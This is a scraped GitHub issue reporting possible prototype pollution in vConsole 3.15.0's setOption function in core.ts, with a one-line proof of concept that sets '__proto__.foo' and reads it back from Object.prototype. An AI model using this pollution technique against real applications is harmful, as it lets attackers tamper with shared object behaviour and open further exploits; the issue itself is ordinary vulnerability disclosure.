Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
vConsole Version: 3.15.0
vConsole/src/core/core.ts
Lines 519 to 542 in 346ae64
var vConsole = new window.VConsole(); vConsole.setOption("__proto__.foo","bar"); vConsole.setOption("__proto__.noOrig",1); console.log(Object.prototype.foo);
The text was updated successfully, but these errors were encountered:
No branches or pull requests
vConsole Version: 3.15.0
issue
vConsole/src/core/core.ts
Lines 519 to 542 in 346ae64
Possible prototype pollution due to incorrect key and value resolution in setOptions in core.ts.
poc
The text was updated successfully, but these errors were encountered: